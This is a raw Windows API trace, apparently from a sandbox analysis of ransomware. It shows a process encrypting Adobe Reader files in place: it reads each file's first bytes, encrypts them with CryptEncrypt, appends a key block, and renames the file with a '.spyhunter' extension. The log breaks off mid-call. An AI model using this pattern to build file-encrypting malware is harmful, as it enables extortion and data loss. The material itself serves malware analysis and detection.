CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\eu_ES\\SendMail.EUQ" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\eu_es\\sendmail.euq"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0114.988] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\eu_ES\\SendMail.EUQ") returned 77 [0114.988] StrStrW (lpFirst="SendMail.EUQ", lpSrch=".txt") returned 0x0 [0114.988] GetProcessHeap () returned 0x2c0000 [0114.988] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0114.988] ReadFile (in: hFile=0xb4, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f93c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x248f93c*=0x2800, lpOverlapped=0x0) returned 1 [0115.057] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0115.057] WriteFile (in: hFile=0xb4, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248f93c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x248f93c*=0x2800, lpOverlapped=0x0) returned 1 [0115.375] GetProcessHeap () returned 0x2c0000 [0115.375] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0115.375] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0115.375] WriteFile (in: hFile=0xb4, lpBuffer=0x248f97c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f93c, lpOverlapped=0x0 | out: lpBuffer=0x248f97c*, lpNumberOfBytesWritten=0x248f93c*=0x4, lpOverlapped=0x0) returned 1 [0115.376] WriteFile (in: hFile=0xb4, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f93c, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x248f93c*=0x30, lpOverlapped=0x0) returned 1 [0115.376] CloseHandle (hObject=0xb4) returned 1 [0115.376] GetProcessHeap () returned 0x2c0000 [0115.376] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2e56ea8 [0115.500] wnsprintfW (in: pszDest=0x2e56ea8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\eu_ES\\SendMail.EUQ.spyhunter") returned 87 [0115.501] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\eu_ES\\SendMail.EUQ" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\eu_es\\sendmail.euq"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\eu_ES\\SendMail.EUQ.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\eu_es\\sendmail.euq.spyhunter")) returned 1 [0115.507] GetProcessHeap () returned 0x2c0000 [0115.507] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e56ea8 | out: hHeap=0x2c0000) returned 1 [0115.507] GetProcessHeap () returned 0x2c0000 [0115.507] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0115.507] GetProcessHeap () returned 0x2c0000 [0115.507] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e13cd8 | out: hHeap=0x2c0000) returned 1 [0116.602] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f978 | out: pbBuffer=0x248f978) returned 1 [0116.602] GetProcessHeap () returned 0x2c0000 [0116.602] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0116.602] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x248f970*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x248f970*=0x30) returned 1 [0116.603] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\nl_NL\\Search.NLD" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\nl_nl\\search.nld"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0117.027] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\nl_NL\\Search.NLD") returned 75 [0117.028] StrStrW (lpFirst="Search.NLD", lpSrch=".txt") returned 0x0 [0117.028] GetProcessHeap () returned 0x2c0000 [0117.028] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0117.028] ReadFile (in: hFile=0x154, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f934, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x248f934*=0x2800, lpOverlapped=0x0) returned 1 [0117.093] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0117.093] WriteFile (in: hFile=0x154, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248f934, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x248f934*=0x2800, lpOverlapped=0x0) returned 1 [0117.093] GetProcessHeap () returned 0x2c0000 [0117.093] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0117.093] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0117.093] WriteFile (in: hFile=0x154, lpBuffer=0x248f974*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f934, lpOverlapped=0x0 | out: lpBuffer=0x248f974*, lpNumberOfBytesWritten=0x248f934*=0x4, lpOverlapped=0x0) returned 1 [0117.093] WriteFile (in: hFile=0x154, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f934, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x248f934*=0x30, lpOverlapped=0x0) returned 1 [0117.094] CloseHandle (hObject=0x154) returned 1 [0117.094] GetProcessHeap () returned 0x2c0000 [0117.094] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2e95b58 [0117.094] wnsprintfW (in: pszDest=0x2e95b58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\nl_NL\\Search.NLD.spyhunter") returned 85 [0117.094] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\nl_NL\\Search.NLD" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\nl_nl\\search.nld"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\nl_NL\\Search.NLD.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\nl_nl\\search.nld.spyhunter")) returned 1 [0117.095] GetProcessHeap () returned 0x2c0000 [0117.095] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e95b58 | out: hHeap=0x2c0000) returned 1 [0117.095] GetProcessHeap () returned 0x2c0000 [0117.095] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0117.095] GetProcessHeap () returned 0x2c0000 [0117.095] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e57860 | out: hHeap=0x2c0000) returned 1 [0117.146] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f968 | out: pbBuffer=0x248f968) returned 1 [0117.146] GetProcessHeap () returned 0x2c0000 [0117.146] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0117.146] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x248f960*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x248f960*=0x30) returned 1 [0117.146] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\sv_SE\\Weblink.SVE" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\sv_se\\weblink.sve"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf4 [0117.156] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\sv_SE\\Weblink.SVE") returned 76 [0117.156] StrStrW (lpFirst="Weblink.SVE", lpSrch=".txt") returned 0x0 [0117.156] GetProcessHeap () returned 0x2c0000 [0117.156] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0117.156] ReadFile (in: hFile=0xf4, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f924, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248f924*=0x2800, lpOverlapped=0x0) returned 1 [0117.170] SetFilePointerEx (in: hFile=0xf4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0117.170] WriteFile (in: hFile=0xf4, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248f924, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248f924*=0x2800, lpOverlapped=0x0) returned 1 [0117.170] GetProcessHeap () returned 0x2c0000 [0117.170] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0117.170] SetFilePointerEx (in: hFile=0xf4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0117.170] WriteFile (in: hFile=0xf4, lpBuffer=0x248f964*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f924, lpOverlapped=0x0 | out: lpBuffer=0x248f964*, lpNumberOfBytesWritten=0x248f924*=0x4, lpOverlapped=0x0) returned 1 [0117.279] WriteFile (in: hFile=0xf4, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f924, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x248f924*=0x30, lpOverlapped=0x0) returned 1 [0117.279] CloseHandle (hObject=0xf4) returned 1 [0117.279] GetProcessHeap () returned 0x2c0000 [0117.279] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ea7ba0 [0117.279] wnsprintfW (in: pszDest=0x2ea7ba0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\sv_SE\\Weblink.SVE.spyhunter") returned 86 [0117.279] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\sv_SE\\Weblink.SVE" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\sv_se\\weblink.sve"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\sv_SE\\Weblink.SVE.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\sv_se\\weblink.sve.spyhunter")) returned 1 [0117.280] GetProcessHeap () returned 0x2c0000 [0117.280] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ea7ba0 | out: hHeap=0x2c0000) returned 1 [0117.280] GetProcessHeap () returned 0x2c0000 [0117.280] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0117.280] GetProcessHeap () returned 0x2c0000 [0117.280] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e6f730 | out: hHeap=0x2c0000) returned 1 [0117.280] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f968 | out: pbBuffer=0x248f968) returned 1 [0117.281] GetProcessHeap () returned 0x2c0000 [0117.281] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0117.281] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x248f960*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x248f960*=0x30) returned 1 [0117.281] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_CN\\updater.CHS" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\zh_cn\\updater.chs"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf4 [0117.281] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_CN\\updater.CHS") returned 76 [0117.281] StrStrW (lpFirst="updater.CHS", lpSrch=".txt") returned 0x0 [0117.281] GetProcessHeap () returned 0x2c0000 [0117.281] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0117.281] ReadFile (in: hFile=0xf4, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f924, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248f924*=0x1e00, lpOverlapped=0x0) returned 1 [0117.290] SetFilePointerEx (in: hFile=0xf4, liDistanceToMove=0xffffe200, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0117.290] WriteFile (in: hFile=0xf4, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x1e00, lpNumberOfBytesWritten=0x248f924, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248f924*=0x1e00, lpOverlapped=0x0) returned 1 [0117.290] GetProcessHeap () returned 0x2c0000 [0117.290] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0117.290] SetFilePointerEx (in: hFile=0xf4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0117.290] WriteFile (in: hFile=0xf4, lpBuffer=0x248f964*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f924, lpOverlapped=0x0 | out: lpBuffer=0x248f964*, lpNumberOfBytesWritten=0x248f924*=0x4, lpOverlapped=0x0) returned 1 [0117.291] WriteFile (in: hFile=0xf4, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f924, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x248f924*=0x30, lpOverlapped=0x0) returned 1 [0117.291] CloseHandle (hObject=0xf4) returned 1 [0117.291] GetProcessHeap () returned 0x2c0000 [0117.291] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ea7ba0 [0117.291] wnsprintfW (in: pszDest=0x2ea7ba0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_CN\\updater.CHS.spyhunter") returned 86 [0117.291] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_CN\\updater.CHS" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\zh_cn\\updater.chs"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_CN\\updater.CHS.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\zh_cn\\updater.chs.spyhunter")) returned 1 [0117.300] GetProcessHeap () returned 0x2c0000 [0117.300] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ea7ba0 | out: hHeap=0x2c0000) returned 1 [0117.300] GetProcessHeap () returned 0x2c0000 [0117.300] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0117.300] GetProcessHeap () returned 0x2c0000 [0117.300] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e71430 | out: hHeap=0x2c0000) returned 1 [0117.323] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f960 | out: pbBuffer=0x248f960) returned 1 [0117.323] GetProcessHeap () returned 0x2c0000 [0117.323] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0117.324] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x248f958*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x248f958*=0x30) returned 1 [0117.324] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_CN\\SendMail.CHS" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\zh_cn\\sendmail.chs"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0117.324] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_CN\\SendMail.CHS") returned 77 [0117.324] StrStrW (lpFirst="SendMail.CHS", lpSrch=".txt") returned 0x0 [0117.324] GetProcessHeap () returned 0x2c0000 [0117.324] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0117.324] ReadFile (in: hFile=0x154, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f91c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x248f91c*=0x2800, lpOverlapped=0x0) returned 1 [0117.334] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0117.334] WriteFile (in: hFile=0x154, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248f91c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x248f91c*=0x2800, lpOverlapped=0x0) returned 1 [0117.334] GetProcessHeap () returned 0x2c0000 [0117.334] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0117.334] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0117.334] WriteFile (in: hFile=0x154, lpBuffer=0x248f95c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f91c, lpOverlapped=0x0 | out: lpBuffer=0x248f95c*, lpNumberOfBytesWritten=0x248f91c*=0x4, lpOverlapped=0x0) returned 1 [0117.335] WriteFile (in: hFile=0x154, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f91c, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x248f91c*=0x30, lpOverlapped=0x0) returned 1 [0117.335] CloseHandle (hObject=0x154) returned 1 [0117.335] GetProcessHeap () returned 0x2c0000 [0117.335] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2e95b58 [0117.335] wnsprintfW (in: pszDest=0x2e95b58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_CN\\SendMail.CHS.spyhunter") returned 87 [0117.335] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_CN\\SendMail.CHS" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\zh_cn\\sendmail.chs"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_CN\\SendMail.CHS.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\zh_cn\\sendmail.chs.spyhunter")) returned 1 [0117.431] GetProcessHeap () returned 0x2c0000 [0117.431] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e95b58 | out: hHeap=0x2c0000) returned 1 [0117.431] GetProcessHeap () returned 0x2c0000 [0117.431] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0117.432] GetProcessHeap () returned 0x2c0000 [0117.432] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e71260 | out: hHeap=0x2c0000) returned 1 [0117.432] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f958 | out: pbBuffer=0x248f958) returned 1 [0117.432] GetProcessHeap () returned 0x2c0000 [0117.432] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0117.432] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x248f950*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x248f950*=0x30) returned 1 [0117.432] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\AcroForm\\PMP\\DataMatrix.pmp" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\acroform\\pmp\\datamatrix.pmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0117.471] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\AcroForm\\PMP\\DataMatrix.pmp") returned 88 [0117.471] StrStrW (lpFirst="DataMatrix.pmp", lpSrch=".txt") returned 0x0 [0117.471] GetProcessHeap () returned 0x2c0000 [0117.471] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0117.471] ReadFile (in: hFile=0x17c, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f914, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x248f914*=0x2800, lpOverlapped=0x0) returned 1 [0117.481] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0117.481] WriteFile (in: hFile=0x17c, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248f914, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x248f914*=0x2800, lpOverlapped=0x0) returned 1 [0117.482] GetProcessHeap () returned 0x2c0000 [0117.482] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0117.482] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0117.482] WriteFile (in: hFile=0x17c, lpBuffer=0x248f954*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f914, lpOverlapped=0x0 | out: lpBuffer=0x248f954*, lpNumberOfBytesWritten=0x248f914*=0x4, lpOverlapped=0x0) returned 1 [0117.489] WriteFile (in: hFile=0x17c, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f914, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x248f914*=0x30, lpOverlapped=0x0) returned 1 [0117.489] CloseHandle (hObject=0x17c) returned 1 [0117.489] GetProcessHeap () returned 0x2c0000 [0117.489] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ea7ba0 [0117.489] wnsprintfW (in: pszDest=0x2ea7ba0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\AcroForm\\PMP\\DataMatrix.pmp.spyhunter") returned 98 [0117.489] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\AcroForm\\PMP\\DataMatrix.pmp" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\acroform\\pmp\\datamatrix.pmp"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\AcroForm\\PMP\\DataMatrix.pmp.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\acroform\\pmp\\datamatrix.pmp.spyhunter")) returned 1 [0117.490] GetProcessHeap () returned 0x2c0000 [0117.490] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ea7ba0 | out: hHeap=0x2c0000) returned 1 [0117.490] GetProcessHeap () returned 0x2c0000 [0117.490] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0117.490] GetProcessHeap () returned 0x2c0000 [0117.490] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e54160 | out: hHeap=0x2c0000) returned 1 [0117.490] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f958 | out: pbBuffer=0x248f958) returned 1 [0117.490] GetProcessHeap () returned 0x2c0000 [0117.490] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0117.490] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x248f950*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x248f950*=0x30) returned 1 [0117.490] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\CHT\\StandardBusiness.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\cht\\standardbusiness.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0117.918] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\CHT\\StandardBusiness.pdf") returned 104 [0117.918] StrStrW (lpFirst="StandardBusiness.pdf", lpSrch=".txt") returned 0x0 [0117.918] GetProcessHeap () returned 0x2c0000 [0117.918] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0117.918] ReadFile (in: hFile=0x17c, lpBuffer=0x2c375d8, 